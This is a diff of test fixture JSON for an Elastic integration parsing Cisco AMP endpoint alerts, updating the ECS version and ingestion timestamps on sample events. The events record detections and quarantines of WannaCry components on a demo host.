                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2239,7 +2239,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2271,7 +2271,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843603663Z",
+                "ingested": "2021-09-13T18:07:04.510378867Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2339,7 +2339,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2371,7 +2371,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843605546Z",
+                "ingested": "2021-09-13T18:07:04.510380745Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2428,7 +2428,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2448,7 +2448,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843607426Z",
+                "ingested": "2021-09-13T18:07:04.510382667Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2499,7 +2499,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2519,7 +2519,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843609310Z",
+                "ingested": "2021-09-13T18:07:04.510384507Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2570,7 +2570,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2590,7 +2590,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843611171Z",
+                "ingested": "2021-09-13T18:07:04.510386359Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2641,7 +2641,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2661,7 +2661,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843613053Z",
+                "ingested": "2021-09-13T18:07:04.510388218Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2712,7 +2712,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2732,7 +2732,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843615119Z",
+                "ingested": "2021-09-13T18:07:04.510390180Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2783,7 +2783,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2803,7 +2803,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843617007Z",
+                "ingested": "2021-09-13T18:07:04.510392045Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2858,7 +2858,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2878,7 +2878,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843618896Z",
+                "ingested": "2021-09-13T18:07:04.510393933Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2933,7 +2933,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2953,7 +2953,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843620759Z",
+                "ingested": "2021-09-13T18:07:04.510395806Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3008,7 +3008,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3028,7 +3028,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843622635Z",
+                "ingested": "2021-09-13T18:07:04.510397685Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3096,7 +3096,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3128,7 +3128,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843624521Z",
+                "ingested": "2021-09-13T18:07:04.510399559Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3198,7 +3198,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3230,7 +3230,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843639044Z",
+                "ingested": "2021-09-13T18:07:04.510401442Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3287,7 +3287,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3307,7 +3307,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843642931Z",
+                "ingested": "2021-09-13T18:07:04.510403305Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3358,7 +3358,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3378,7 +3378,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843644903Z",
+                "ingested": "2021-09-13T18:07:04.510405200Z",
